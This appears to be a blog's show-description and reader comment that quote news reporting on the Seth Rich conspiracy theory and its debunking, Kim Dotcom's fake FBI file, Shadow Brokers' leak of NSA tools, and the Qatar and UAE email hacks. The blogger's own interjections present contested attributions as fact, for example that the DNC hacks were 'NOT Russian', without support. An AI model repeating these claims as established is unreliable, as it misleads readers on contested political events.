Nevertheless, many on the right were inspired by the WikiLeaks insinuations and started to concoct their own conspiracy theories about Rich’s murder. In August, former House speaker and presidential candidate Newt Gingrich told a conservative talk show host that Rich’s death was suspicious. “First of all, of course it’s worth talking about,” he said. “And if Assange says he is the source, Assange may know. That’s not complicated.”

That same month, Trump adviser Roger Stone claimed, without evidence, that Rich was murdered “on his way to meet with the FBI to discuss election fraud.”

To Trump supporters, the claim that Rich had been murdered by the Clintons had twofold appeal: It reinforced the rumor that the Clintons were shady operatives, and it distracted from the mounting evidence that Russia had interfered with the US election — possibly in collusion with the Trump campaign.

In the presidential debate on September 26, Trump famously suggested that it could have been a lone hacker who was responsible for the stolen DNC emails. “It could be Russia, but it could also be China. It could also be lots of other people. It also could be somebody sitting on their bed that weighs 400 pounds,” he said.

Thanks to a weird miscommunication, the conspiracy theory comes back in May

After the election, the conspiracy theories about Seth Rich faded from public consciousness, as the focus turned instead to the FBI’s investigation of connections between Trump staffers and Russian agents. Suspicions still bubbled in right-wing corners of Reddit and on alt-right websites like Gateway Pundit, and Assange continued to claim that it wasn’t the Russians who provided the hacked emails — but most of America had moved on.

But Rich returned to the news last week, when the local TV station FOX 5 DC aired an interview with private investigator Rod Wheeler, who claimed that sources in the FBI told him there was evidence of a connection between Rich and WikiLeaks:

FOX 5 DC: You have sources at the FBI saying that there is information…

WHEELER: For sure…

FOX 5 DC: …that could link Seth Rich to WikiLeaks?

WHEELER: Absolutely. Yeah. That’s confirmed.

Conservative media outlets jumped on the story, which aired the night of Monday, May 15. By Tuesday morning, conservative outlets like Breitbart, the Blaze, and the Daily Caller all had their own pieces relaying Wheeler’s claims.

On Tuesday, Fox News added its own revelation: It claimed that an unnamed “federal investigator” had confirmed that Rich had been in contact with WikiLeaks. “I have seen and read the emails between Seth Rich and Wikileaks,” the source said, according to Fox News. Fox News additionally claimed this source had evidence that Rich had given thousands of DNC emails to WikiLeaks.

This was a two-source story: The report also said that Wheeler had independently corroborated what the anonymous “federal investigator” had told Fox News.

But here’s where it gets confusing. By Tuesday afternoon, Wheeler told CNN that he had misspoken. It turns out he didn’t have any evidence of his own.

What had happened, apparently, was that earlier in the week, Fox News had contacted Wheeler for its own story on Rich. That was when Wheeler learned that Fox News had a source alleging there was contact between Rich and WikiLeaks. When Wheeler went on local TV on Monday night to talk about Rich, he believed he was giving viewers a “preview” of the Fox News story set to run on Tuesday.

That, at least, is how Wheeler explained the situation to CNN last Tuesday. Somehow, through miscommunication or sloppy reporting, the Fox News report used Wheeler to back up its claims about the Rich-WikiLeaks connection. This was incorrect, Wheeler said. He had no independent knowledge.

“I only got that [information] from the reporter at Fox News,” he told CNN.

Yesterday, after leaving it up for a week, Fox News finally retracted its Seth Rich story, which was down to one anonymous source. “The article was not initially subjected to the high degree of editorial scrutiny we require for all our reporting,” an editor’s note explained. “Upon appropriate review, the article was found not to meet those standards and has since been removed.”

Conservative media has a field day

It’s unlikely that any of this would have been a big deal had there not been a stunning series of damaging reports about Donald Trump last week.

Among other things, it was revealed that Trump had shared state secrets with the Russians, that he had pressured FBI Director James Comey to drop his investigation into ties between Trump affiliates and Russia, and that the Russia probe had reached a current high-level White House official, who many suspect is Trump’s son-in-law, Jared Kushner.

One way the conservative media minimized all the bad news was to focus on other stories. The latest Seth Rich allegations became a welcome distraction from the constant revelations coming out of the Washington Post and the New York Times.

For instance, while most outlets were covering the revelation that Trump had volunteered classified information to Russians, the alt-right website Breitbart devoted its front page to the Seth Rich conspiracy. Breitbart even slammed the mainstream media for ignoring the rumors about Rich: “Silence from Establishment Media over Seth Rich WikiLeaks Report” was the title of one story.

Fox News in particular devoted outsize attention to the Rich story, repeatedly rehashing the conspiracy theory. On his 10 pm show, Fox pundit Sean Hannity devoted segments to Rich on Tuesday, Thursday, and Friday last week. “I’m not backing off asking questions even though there is an effort that nobody talk about Seth Rich,” he said on Friday night.

On Tuesday, even after Fox News retracted the story that ignited the latest round of speculation, Hannity remained convinced that the Seth Rich conspiracy theory had legs. “I am not Fox.com or FoxNews.com,” he said on his radio show. “I retracted nothing.”

Later that evening, on his television show, Hannity said that for now, he would stop talking about Rich “out of respect for the family’s wishes.” On Twitter, though, he was defiant, claiming that “liberal fascism” was trying to silence his voice.

“Ok TO BE CLEAR, I am closer to the TRUTH than ever,” he tweeted. “Not only am I not stopping, I am working harder.”

“Please retweet,” he added.

Rich was an unlucky victim of the conservative media

The recent attention has reignited the old Seth Rich conspiracy theories, bringing forth even more unsubstantiated claims.

On Fox News’s Sunday morning talk show, Newt Gingrich repeated his belief that Rich, not Russia, was responsible for the DNC hack. “It turns out, it wasn’t the Russians,” he said. “It was this young guy who, I suspect, was disgusted by the corruption of the Democratic National Committee.”

On Monday, Assange issued a cryptic tweet using the hashtag “#SethRich” which fanned the flames even further: “WikiLeaks has never disclosed a source. Sources sometimes talk to other parties but identities never emerge from WikiLeaks. #SethRich.”

And on Tuesday, New Zealand file-sharing entrepreneur Kim Dotcom, who is wanted by the US government for copyright infringement and racketeering, claimed that Rich had personally contacted him in 2014, and that the two had talked about “a number of topics including corruption and the influence of corporate money in politics.”

“I know that Seth Rich was involved in the DNC leak,” Dotcom wrote in a statement. . . .

Kim Dotcom manifesting the lifestyle of the politically and economically oppressed.

7. Kim Dotcom just tweeted out a document that’s allegedly from the FBI demonstrating that Seth Rich was indeed the source of the hacked DNC emails. The twist is that the document is a blatant fraud and Kim Dotcom acknowledges as much. Ol’ Kim decided to tweet it out anyway, asserting that there’s no need to delete the tweet promoting the fake document because, hey, he put up some subsequent tweets questioning its authenticity. Twist & spin.

However, there was another rather intriguing admission by Dotcom in the interview below, in which he was asked why he tweeted out documents he knew were fake: Dotcom continues to assert that he has evidence that Rich was the source of the DNC hacks.

He’s just not ready to reveal it yet, but he strongly hints that the evidence has to do with his close ties to WikiLeaks. He then refers back to a Bloomberg TV interview he did on May 13th, 2015, in which Dotcom predicts that Julian Assange is going to be Hillary Clinton’s “worst nightmare” in the upcoming election. How so? Because, says Dotcom, Assange “has access to information,” without going into specifics.

Of fundamental importance to our understanding is the assertion by Craig Murray, former UK ambassador to Uzbekistan, that the information given to WikiLeaks wasn’t a hack at all, but information from a flash drive handed to Murray by a DNC insider.

There may well have been hacks into the DNC and e-mail of John D. Podesta, but they were NOT Russian.

Dotcom refers to a May 2015 interview in which he confidently asserts that Julian Assange already had a bunch of dirt on Hillary and was going to be her worst nightmare. That interview came long before Seth Rich would have been in a position to pass along emails, before Rich would have had a motive if he really was a disillusioned Bernie-crat, and shortly before the point at which Crowdstrike “concluded” the DNC was initially hacked. And yet we didn’t really see any old embarrassing emails emerge from WikiLeaks during the campaign. Along with being incredibly sleazy, it’s all rather curious:

“Kim Dotcom Says FBI File About Seth Rich Is Fake, But He Won’t Delete It From Twitter” by Matt Novak; Gizmodo; 5/20/2017

Have you seen that FBI file, purporting to be about the death of DNC staffer Seth Rich? Kim Dotcom, who thrust himself into the story recently by telling Sean Hannity that he had evidence Rich had sent documents to Wikileaks, published the document on Twitter, helping to spread it online. Dotcom now acknowledges that the document is fake. But he told Gizmodo that he’s not going to delete it.

The fake FBI document was first published on a website called Borderland Alternative Media and it wasn’t long before it started to spread on social media, including by Kim Dotcom. Alex Jones’ Prison Planet picked it up, but has since deleted its own version of the story.

The internet’s interest in the July 2016 murder of Seth Rich revolves around claims that he leaked Democratic Party documents to Wikileaks, an idea that Julian Assange has hinted at repeatedly. The police say that Seth Rich’s murder was a robbery gone bad. But internet conspiracy theorists believe that Rich was killed as retribution for leaking emails about the DNC. Whatever the case, the FBI file is complete bullshit.

“I was skeptical. I tweeted that the document could be a fake and that the FBI has to weigh in about it,” Dotcom told me over direct message on Twitter.

The document is obviously fake to anyone who’s looked at real FBI files. For one thing, the FBI doesn’t use black to redact information, it uses white boxes. And much more damningly, the redactions include partial words and partial dates, as well as the partial redaction of its classification stamp, things that would never be done.

[see pics of hoax FBI documents]

You can see the comparison between the fake FBI file on Seth Rich (above left) with a recently obtained FBI file on military historian Robert Dorr (above right). It’s a sloppy fake.

“After doing some forensic analysis of the document I came to believe it is not authentic. And I have retweeted Wikileaks which came to the same conclusion,” Dotcom told me.

But as any Twitter user knows, tweets with incorrect information spread much faster than corrections. So I asked Dotcom why he didn’t delete the tweets with the fake FBI file.

“There is no need to delete those tweets because I have been very cautious and warned within an hour of the release of that document that it could be a fake,” Dotcom told me.

That all seemed reasonable, if misguided, to me. But then I asked Dotcom for evidence of his claims that he knows Rich was involved in the DNC leak. During our back and forth on Twitter DM, Dotcom sent me a message saying that he knew I wasn’t going to write a balanced piece, and insinuated that he simply knows because of his close ties to Wikileaks.

I just had a look at your twitter feed and it looks like you are very much anti-trump. And that’s ok. I already know that your story won’t be balanced. But this is not a Trump issue. Seth was a Sanders supporter. The progressives should ask what really happened to Seth. He’s one of yours. And they should be interested that the matters I have raised are properly investigated.

Please have a look at my Bloomberg interview in which I announced long before the election that Julian is going to be a problem for Clinton. My relations to Wikileaks are well known. I have said many times in the past that I have been a major donor and Julian has been a guest at my moment of Truth event.

How do you think I knew?

The Bloomberg interview Dotcom is referring to is from May 13, 2015, wherein he said that Assange would be “Clinton’s worst nightmare.” At this point, Clinton had just announced her candidacy a month earlier and Donald Trump hadn’t even entered the race yet.

Interviewer: You’re saying Julian Assange is going to be Hillary’s worst nightmare?

Dotcom: I think so, yeah.

Interviewer: How so?

Dotcom: Well, he has access to information.

Interviewer: What information?

Dotcom: I don’t know the specifics.

Interviewer: Why Hillary in particular?

Dotcom: Hillary hates Julian. She’s just an adversary, I think, of internet freedom.

Interviewer: And she signed your extradition request.

Dotcom: Yeah.

Interviewer: So, you have a bone to pick with her.

Dotcom: You know what the craziest thing is? I actually like Hillary. I like Obama. So it’s so crazy that all of this happened.

During the course of our conversation over Twitter DM, Dotcom pointed me to numerous links online, but none of them answered my basic question: How do you know that Seth Rich was involved in the DNC leak?

One of the links Dotcom sent me contained his open letter to the family of Seth Rich, who have asked Dotcom to stop spreading conspiracy theories about the murder of their son.

In that letter, Dotcom says “I simply wish to make sure that the investigators have the benefit of my evidence.” Again, I asked Dotcom for that evidence and he said that he would only show such things to the Rich family, at the advice of his lawyers and “out of respect for the Rich family.”

But Dotcom’s most recent public comment on the matter, a letter posted today directed to the FBI Special Counsel who are investigating the Trump regime’s ties to Russia, makes it look like Dotcom’s interest in the Seth Rich case may not be altogether altruistic.

Dotcom is originally from Germany but moved to New Zealand from Hong Kong in 2009, and is currently wanted in the United States for running the file hosting and sharing site Megaupload, which was accused of systematically violating copyright. His extradition to the US has been blocked repeatedly and he’s been in a state of legal limbo for years.

But Dotcom’s new letter to the FBI Special Counsel says that he’d be willing to share his evidence that Seth Rich was involved in leaking information to Wikileaks provided he’s given safe passage to the US:

Mr Dotcom is also committed to achieving an outcome where his evidence can be properly received and reviewed by you as part of the Investigation. You will, however, appreciate that, given his current status, he is not in a position to voluntarily leave New Zealand’s jurisdiction. Further, he is concerned that, should he travel to the United States voluntarily, he would be arrested and detained in custody on the current counts on which he has been indicted.

The letter goes on to say that after “special arrangements” have been made, he’ll be glad to travel to the US to give his evidence. One imagines that those special arrangements would involve dropping the case against him.

Accordingly, for Mr Dotcom to attend in person in the United States to make a statement, and/or give oral evidence at any subsequent hearing, special arrangements would need to be discussed and agreed between all relevant parties. Such arrangements would need to include arrangements for his safe passage from New Zealand and return. This is because Mr Dotcom is determined to clear his name in New Zealand.

So make of that what you will. Kim Dotcom clearly has reason to be angry at the US Justice Department, but if he really had evidence proving that a man was murdered for political reasons, it seems a bit shady to use it as a bargaining chip for your own freedom. It seems unlikely that the FBI would grant Dotcom’s request, so if he really does have any information on the Seth Rich case, we may never get to see it.

But given the fact that there’s virtually no evidence outside of the wildest conspiracy theory boards that Seth Rich was killed by anyone connected to the Clinton campaign, I wouldn’t hold my breath anyway.

8. The Shadow Brokers released some more NSA hacking tools, along with a list of IP addresses the NSA was targeting. All of this was apparently in response to a sense of betrayal. Betrayal by Donald Trump. Yes, when Donald Trump launched a cruise missile attack against Syria, this so upset The Shadow Brokers that they wrote another long broken-English rant (with a white nationalist theme) about Trump living up to his promises and then released some more hacking tools.

We analyzed the Shadow Brokers in FTR #923.

Suffice it to say that this group is, in all probability, not Russian at all.

“Mysterious Group Posts More Alleged NSA Hacking Tools; Russia Link Suspected” by Tim Johnson; McClatchy DC; 4/10/2017.

In the latest in a drumbeat of intelligence leaks, a hacking group known as the Shadow Brokers has released another set of tools it said were designed by the top-secret National Security Agency to penetrate computer systems worldwide.

In a rant-filled statement over the weekend, Shadow Brokers also released a list of servers it said the tools had infected.

One document appeared to show that NSA spyware had been placed on servers in South Korea, Russia, Japan, China, Mexico, Taiwan, Spain, Venezuela and Thailand, among other countries. The dump included details of how the NSA purportedly had gained access to Pakistan’s main mobile network.

The release marked the most recent in a steady stream of disclosures of purported hacking tools developed by the NSA and the CIA. Shadow Brokers made a similar release in August, and in March the anti-secrecy group WikiLeaks released several batches of files that purported to show how the CIA spies on its targets. WikiLeaks has dubbed those leaks Vault7.

Cybersecurity experts differed in their assessment of the leaked material but several agreed that it would give global foes crucial information about American hacking abilities and plans.

In its statement, Shadow Brokers said the latest leak, following one eight months ago, “is our form of protest” to goad President Donald Trump into staying loyal to his followers and promoting anti-globalism. The screed included profanity, some white supremacist commentary and a password to the cache of tools. . . .

9. CrowdStrike, the firm at the epicenter of the supposed Russian hacking controversy, is noteworthy. Its co-founder and chief technology officer, Dmitri Alperovitch, is a senior fellow at the Atlantic Council, which is financed by elements that are at the foundation of fanning the flames of the New Cold War.

“Is Skepticism Treason?” by James Carden; The Nation; 1/3/2017.

. . . In this respect, it is worth noting that one of the commercial cybersecurity companies the government has relied on is Crowdstrike, which was one of the companies initially brought in by the DNC to investigate the alleged hacks. . . . Dmitri Alperovitch is also a senior fellow at the Atlantic Council. . . . The connection between [Crowdstrike co-founder and chief technology officer Dmitri] Alperovitch and the Atlantic Council has gone largely unremarked upon, but it is relevant given that the Atlantic Council—which is funded in part by the US State Department, NATO, the governments of Latvia and Lithuania, the Ukrainian World Congress, and the Ukrainian oligarch Victor Pinchuk—has been among the loudest voices calling for a new Cold War with Russia. As I pointed out in the pages of The Nation in November, the Atlantic Council has spent the past several years producing some of the most virulent specimens of the new Cold War propaganda. . . .

10. Next, the program highlights a topic that was initially broached in the last program. The OUN/B milieu in the U.S. has apparently been instrumental in generating the “Russia did it” disinformation about the high-profile hacks. A Ukrainian activist named Alexandra Chalupa has been instrumental in distributing this disinformation to Hillary Clinton and influencing the progress of the disinformation in the media.

“The Anonymous Blacklist Quoted by the Washington Post Has Apparent Ties to Ukrainian Fascism and CIA Spying” by Mark Ames; Alternet.org; 12/7/2016.

. . . . One of the key media sources [46] who blamed the DNC hacks on Russia, ramping up fears of crypto-Putinist infiltration, is a Ukrainian-American lobbyist working for the DNC. She is Alexandra Chalupa—described as the head of the Democratic National Committee’s opposition research on Russia and on Trump, and founder and president of the Ukrainian lobby group ‘US United With Ukraine Coalition’ [47], which lobbied hard to pass a 2014 bill increasing loans and military aid to Ukraine, imposing sanctions on Russians, and tightly aligning US and Ukraine geostrategic interests. . . . In one leaked DNC email [50] earlier this year, Chalupa boasts to DNC Communications Director Luis Miranda that she brought Isikoff to a US-government sponsored Washington event featuring 68 Ukrainian journalists, where Chalupa was invited ‘to speak specifically about Paul Manafort.’ In turn, Isikoff named her as the key inside source [46] ‘proving’ that the Russians were behind the hacks, and that Trump’s campaign was under the spell of Kremlin spies and sorcerers. . . .

Discussion

13 comments for “FTR #960 Update on the High Profile Hacks”

  1. Now that Donald Trump appears to be intent on living up to the phrase “it’s not the crime, it’s the coverup” regarding the investigation into possible Russian collusion, hopefully one of the outcomes of the shift of Trump’s culpability from “did he collude with the Russians?” to “did he obstruct justice in the investigation into his collusion with the Russians?” will be a willingness to ask the other obvious question, “did the Trump campaign carry out the hack attacks and make it look like the Russians, regardless of whether or not there was any other collusion?” Because, you know, it seems like pulling off such a stunt and propelling US/Russian relations to a new low and threatening to spark future conflicts in order to cover up a campaign crime would be an incredibly big deal. As big a deal as, if not bigger than, outright collusion, given the destructive capability of a Russian conflict and the obvious potential for such disastrous results that could result from such an operation. Wouldn’t that be treason too?

    So, in the spirit of hoping the latter question gets asked, here’s the latest reminder that cyber-attribution is far more nebulous than most US coverage of this issue would like to admit: you know the now-infamous Qatari news article that trashed Trump, praised Iran, and ended up triggering a severing of relations with Qatar’s Sunni neighbors? And you know how the FBI has already said that Russian hackers did it? Well, there was a second big hack that rattled Middle East governments just a few days later. A hack of the emails of the UAE’s influential ambassador to the US, Yousef Al Otaiba. A hack that appears to be a kind of counter-point to the Qatari hack and intended to create difficulties between the US and UAE and reveal an ongoing UAE campaign to encourage the US to move its massive airbase out of Qatar (presumably to a nearby place like the UAE). And as the attribution to that hack unfolds, it’s looking like a now-familiar story: Russian hackers did it hackers that could have been anyone did it…hackers who decided to use a “.ru” email address to disseminate their hacked material.

    First, here’s an overview of the al Otaiba hack which is mostly a peek behind the US/UAE diplomatic curtain:

    The Huffington Post

    Someone Is Using These Leaked Emails To Embarrass Washington’s Most Powerful Ambassador
    HuffPost confirmed eight inflammatory D.C. insider email exchanges, including between Yousef Al Otaiba and former Defense Secretary Robert Gates.

    By Akbar Shahid Ahmed
    06/03/2017 10:01 am ET | Updated

    WASHINGTON – A mysterious source contacted multiple news outlets this week to share emails between the influential ambassador of the United Arab Emirates, Yousef Al Otaiba, and top figures in the American foreign policy community, including former Defense Secretary Robert Gates.

    In private correspondence, Otaiba – an extremely powerful figure in Washington, D.C., who is reportedly in “in almost constant phone and email contact” with Jared Kushner, President Donald Trump’s adviser and son-in-law – is seen pushing for the U.S. to close down its military base in Qatar and otherwise poking at issues that could drive a wedge between the U.S. and that Arab nation. He also says that his country’s de facto ruler is supportive of a wave of anti-Qatar criticism in the U.S. that the Gulf state last month called a smear campaign and that has prompted behind-the-scenes alarm inside the U.S. government.

    The anonymous leakers told HuffPost they sought to expose the UAE’s efforts to manipulate the U.S. government, and denied any allegiance to Qatar or any other government.

    Regardless of the leakers’ intent, the revelations promise to heighten tensions between the two U.S. partners. If the UAE succeeds in damaging America’s decades-old relationship with Qatar, the result could dramatically undermine U.S. goals in the Middle East. The two American partners’ escalating rivalry could worsen conflict in war zones where they support different proxy forces – notably in Libya, which has become a haven for smugglers, warlords, and terrorists – while distracting attention from bigger international priorities, like restoring stability in Syria and Iraq after the expected battlefield defeat of the Islamic State. And the UAE strategy could leave the U.S. more wedded to that government’s whims, including its policy of maintaining brittle autocratic rule across the region instead of trying to secure long-term stability by having some level of popular participation.

    The UAE and Qatar have taken their rivalry public in recent days following a controversial report in Qatari media. Qatari authorities soon claimed that the May 23 story – which suggested that the country’s ruler, Sheikh Tamim bin Hamad Al Thani, gave a speech describing his respect for Iran, his support for the Palestinian militant group Hamas and his ties with Israel – was a fake product of a hack. But news sources based in the UAE and Saudi Arabia still suggest that it exposed his true feelings.

    Though Qatar and the Emirates are putative allies, they have drifted apart since 2011 because of their differing reactions to the Arab Spring protests that year. As the largely non-violent Muslim Brotherhood movement gained power across the region, Qatar supported it, seeing it as a vehicle for the Middle East’s democratic aspirations. The UAE calls the group a terror front. With a new U.S. administration in power, the time is ripe for one or the other to push for American action in its own interests.

    Otaiba, who has been the UAE’s ambassador to the United States since 2008, is known as one of the best-connected diplomats in Washington, D.C. He makes frequent high-profile appearances around the city and the U.S. speaking circuit, and he’s ensured that the Trump administration has already cozied up to the Emirates, which hosts a recently opened Trump golf course.

    The leakers provided HuffPost with three batches of emails from Otaiba, some as recent as May and others from as far back as 2014, the last time the UAE supported a major effort to spread skepticism about Qatar in the United States. HuffPost contacted eight of the individuals who’d exchanged messages with the ambassador and shared the contents of those emails; none denied that the exchanges took place. Though Otaiba did not respond to repeated HuffPost requests for comment, a UAE Embassy spokeswoman confirmed to the Daily Beast that the Hotmail address used for the messages belongs to him.

    Otaiba’s emails show an effort to build alliances and a focus on Qatar.

    The night before former U.S. Defense Secretary Robert Gates was scheduled to speak at a high-profile Washington conference on Qatar, for instance, Otaiba wrote him an artfully worded note. “The subject of the conference has been a neglected issue in U.S. foreign policy despite all the trouble it’s causing,” the diplomat wrote. “Coming from you, folks will listen carefully.”

    Gates emailed back that he thought he had “the chance to put some folks on notice.”

    Otaiba offered to buy the former Cabinet official lunch and passed along a message from his boss back home. “MBZ sends his best from Abu Dhabi,” the ambassador wrote, using a nickname for UAE Crown Prince Muhammed bin Zayed. “He says ‘give them hell tomorrow.’”

    The next day, Gates offered a scathing assault on Qatar, excoriating its support for Islamists, at an event hosted by the hawkish Foundation for Defense of Democracies. “The United States military doesn’t have any irreplaceable facility,” he said. “Tell Qatar to choose sides or we will change the nature of the relationship, to include downscaling the base.”

    The incident worried U.S. officials. The American ambassador to Qatar, experienced career diplomat Dana Shell Smith, contacted many of the conference speakers beforehand to try to tone down the rhetoric. It appears that her attempt backfired: foundation officials have publicly criticized and questioned her efforts.

    The powerful Washington-based foundation features heavily in the Otaiba emails. While many of those messages show the ambassador helping its analysts plan trips to the UAE, they also contain two of the most striking revelations about Otaiba: He explicitly advocated for moving the U.S. base out of Qatar – something he hasn’t done publicly – and he discussed the idea of pressuring companies in U.S.-friendly countries to avoid business opportunities in Iran.

    An Arab’s Favorite Pro-Israel Group

    The Foundation for Defense of Democracies spends much of its time trying to strengthen ties between Washington and conservative political forces in Israel. But despite the UAE’s refusal to establish diplomatic ties with Israel, the think tank and others in the pro-Israel lobby have found common ground with the Emirates on two major issues: Both want to contain Iran and political Islam. Both suffered a high-profile defeat when the U.S. and other nations reached a nuclear deal with Iran in 2015. And for the past year or so, both have been pushing to make the future of U.S. relations with Qatar a debate in D.C.

    Emirati critiques of Qatar often raise the same points the foundation’s scholars bring up in their frequent appearances before Congress and in the media: The Qatari government provides, in the words of the U.S. Treasury Department, a “permissive jurisdiction” for fundraisers and donors hoping to aid violent Muslim extremists. In supporting the rights of protesters and democracy activists (at least compared to its neighbors), Qatar is accused of promoting Islamists who claim to be peaceful but really seek to impose brutal Shariah law. And it frequently offers a platform to hatemongers targeting Israel, Jews, the minority Shiite community within Islam, LGBTQ individuals and others – generally on its marquee media property, the Arabic edition of Al-Jazeera.

    But experts on the region note that Qatar’s flaws as an American partner are not unique: Kuwait has also been called a “permissive jurisdiction,” and Saudi Arabia and the UAE also host terror financiers and clerics who spread hate speech. The vendetta against Qatar, then, appears to be driven by more defensive concerns, namely the pro-Israel side’s focus on Hamas and anyone who supports that group, and the UAE’s worry that the Muslim Brotherhood could threaten its own ruling regime.

    Otaiba made his views about the U.S. base in Qatar clear in an April 28 message this year to John Hannah, a senior counselor at the Foundation for Defense of Democracies and a former aide to Vice President Dick Cheney.

    Hannah had emailed the ambassador a Forbes article noting that an Emirati-owned hotel would actually be hosting a Hamas conference in “Muslim Brotherhood-loving” Qatar. Otaiba appeared taken aback by the jab; the UAE is rarely criticized in Washington’s policy community.

    “Shouldn’t we be trying to move the base?” he wrote. “I don’t think it’s fair to point the finger at an Emirati company on this one.”

    Hannah responded by saying he agreed about the military base. But he said criticism of the decision to host Hamas was fair no matter who owned the hotel. Otaiba snapped back that the UAE would move its hotel when the U.S. moved its base.

    “Don’t move the hotel,” Hannah answered. “Just force Hamas to reschedule at a different venue not owned by Emiratis.”

    On Friday, Hannah told HuffPost that the communications were business as usual.

    “As a leading Washington think tank, [the foundation] is engaged in policy discussions with a range of actors across the Middle East and elsewhere. My own relationship with Ambassador Otaiba goes back years, including both my time in government and out,” he wrote in an email.

    Although the broader foreign policy conversation is only now noting the alignment of interests between pro-Israel hawks and anti-Iran, anti-Brotherhood forces in the Gulf, like the UAE, informed analysts have recognized it for years.

    In a Feb. 5, 2014, email to Otaiba, lobbyist and former Clinton aide Rich Mintz directs him to note comments by former Obama administration official Dennis Ross at a public think tank event.

    Ross, a former senior adviser to President Barack Obama, is well respected among Middle East policy-makers. In a summary prepared by Mintz’s lobbying firm, Ross appeared to say that “as opposed to a few years ago, the talking points in the Gulf were almost identical to the ones he heard in speaking to Israeli officials.”

    (Mintz did not respond to a HuffPost request for comment; HuffPost was not able to independently confirm that exchange.)

    In recent weeks, Ross has publicly joined the chorus of Qatar critics and Emirates boosters. “The Qataris should know we have alternatives and are prepared to develop them in the UAE and elsewhere unless Qatar is prepared to be a genuine partner and not a party that contributes to the very threats we need to counter,” he wrote in USA Today on May 8.

    ———-

    “Someone Is Using These Leaked Emails To Embarrass Washington’s Most Powerful Ambassador” by Akbar Shahid Ahmed; The Huffington Post; 06/03/2017

    “In private correspondence, Otaiba – an extremely powerful figure in Washington, D.C., who is reportedly in “in almost constant phone and email contact” with Jared Kushner, President Donald Trump’s adviser and son-in-law – is seen pushing for the U.S. to close down its military base in Qatar and otherwise poking at issues that could drive a wedge between the U.S. and that Arab nation. He also says that his country’s de facto ruler is supportive of a wave of anti-Qatar criticism in the U.S. that the Gulf state last month called a smear campaign and that has prompted behind-the-scenes alarm inside the U.S. government.”

    And all these Otabia emails were released just days after the Qatari hack by someone claiming to not work for the Qataris but who merely wants to expose UAE/US lobbying efforts:


    The anonymous leakers told HuffPost they sought to expose the UAE’s efforts to manipulate the U.S. government, and denied any allegiance to Qatar or any other government.

    So was this a Qatari counter-hack? Some other actor who would like to add to the diplomatic tension in the region? At this point we don’t know.

    And as the article below notes, a group going around distributing these hacked emails calls itself “GlobalLeaks” and uses a .ru email. Which would suggest these were Russian hackers…if you take everything at face value. But as a group of cybersecurity researchers who have analyzed the Otaiba hack point out, anyone could have done it and just tried to make it look like Russian hackers (it’s not like .ru email addresses can’t be obtained by non-Russians). And while these researchers can’t attribute the hack to any government or group with precision, they do note that it looks like the methods used by what appears to be a mercenary hacker group that’s been operating in the region. A group that’s been hired by a number of Gulf states to hack other Gulf officials:

    The New York Times

    Hacking in Qatar Highlights a Shift Toward Espionage-for-Hire

    By DAVID D. KIRKPATRICK and SHEERA FRENKEL
    June 8, 2017

    DOHA, Qatar — The report appeared just after midnight on the official Qatari news agency’s website, and its contents were stunning: The emir of Qatar was quoted as describing “tensions” with President Trump and speculating he may not last in office, recommending friendship with Iran, praising the Palestinian militants of Hamas, and then attesting to his own “good” relations with Israel.

    The contradictory statements could hardly have been better contrived to alienate the United States and Arab countries around the Gulf, and Qatar immediately began to deny the report, early on May 24. But within 20 minutes, satellite networks controlled by Saudi Arabia and the United Arab Emirates had seized on the damning news flash and began interviewing long lines of well-prepared commentators to expound on the perfidy of Qatar.

    The Qatari government said the news agency had been hacked, a claim now supported by the F.B.I. and British law enforcement officials. Though they would not say so publicly, Qatari officials blamed the Saudis and Emiratis.

    Probably not coincidentally, a few days later, emails hacked from the Emirates’ ambassador to Washington began turning up in the Western news media and then the Qatari news network Al Jazeera.

    The cyber-intrigue was the opening skirmish in a pitched battle among ostensible Gulf allies this week. Saudi Arabia and the U.A.E. rallied dependent Arab states to cut off diplomatic relations, travel and trade with Qatar, and the unity of the American-backed alliance against the Islamic State and Iran has been fractured.

    But the dirty tricks also heralded a broader transformation in international espionage. The dust-up in the Gulf is the clearest sign yet that cyberattacks coupled with disinformation campaigns are no longer the exclusive domain of sophisticated powers like Russia. Any country can get in the game for the relatively low price of a few freelance hackers.

    The F.B.I. and other experts concluded the hack of Qatar’s news agency was the result of a computer break-in, and was most likely carried out by Russian hackers for hire, according to American and Qatari officials briefed on the investigation. F.B.I. officials told The New York Times that Russian mercenary hackers have frequently come up in investigations of attacks sponsored by nation-states.

    In fact, the hacking war in the Gulf region has likely been going on for years, though it has never played out on such a public stage. In 2015, for example, an Arab intermediary with ties to Qatar provided The Times with internal emails from the Emirati Foreign Ministry which stated that the U.A.E. was knowingly violating a United Nations resolution by shipping weapons to Libyan militias.

    “The fact of the matter is that the U.A.E. violated the U.N. Security Council Resolution on Libya and continues to do so,” Ahmed al-Qasimi, a senior Emirati diplomat, wrote in an internal email that was dated Aug. 4, 2015, and provided to The Times. Other internal Emirati emails about Libyan dealings and North Korean arms deals surfaced through Qatari-linked websites and the Guardian newspaper.

    Qatar has, at times, backed its own Libyan client militias on the other side of a three-year proxy war against the U.A.E — with both sides confounding Western attempts to broker a unity government in Libya.

    In a report scheduled to be released on Friday, two independent cybersecurity researchers claim that at least one group of hackers can be found working as freelancers for a number of Gulf states, and that their methods bear a striking resemblance to the methods used to hack the Emirati ambassador.

    “They seem to be hackers-for-hire, freelancing for all sorts of different clients, and adapting their skills as needed,” said Collin Anderson, who is one of the researchers. Mr. Anderson and his partner, Claudio Guarnieri, have nicknamed the group Bahamut, after a monstrous fish floating in the Arabian Sea in the Jorge Luis Borges novel “Book of Imaginary Beings.”

    The group regularly uses spear phishing attacks — emails designed to look innocent but contain malicious software applications. While it is not yet clear if Bahamut was behind the hack of the ambassador’s email, the group targeted a number of Emirati diplomats as well as other public figures in the Gulf region.

    Other news organizations have reported receiving leaked Emirati emails from a group calling itself GlobalLeaks and using email addressing ending in .ru, suggesting the mercenary hackers may be Russians or wish to pose as Russian.

    The Emirati ambassador, Yousef al-Otaiba, is well known for his assiduous efforts to convince American think tanks and government officials that Qatar had threatened the stability of the region by cheering the Arab uprisings of 2011 and, in particular, by backing the Muslim Brotherhood.

    Mr. Otaiba, a charismatic figure who speaks nearly native-sounding English, has also served as a personal tutor in regional politics to Jared Kushner, the son-in-law and a senior adviser to President Trump.

    Several of the newly leaked emails appear to include examples of Mr. Otaiba pressing anti-Qatari arguments with American officials, who banter with him like old friends.

    In fact, on Thursday, the government of Qatar listed the hacking attack as part of a broader public influence campaign that has been appearing in American newspapers and think tank conferences. A timeline the government distributed to reporters, identified a series of 14 op-ed articles that appeared across the American media in a sudden flurry beginning around the same time — late April — all singling out Qatar for supporting Islamist militants or extremists.

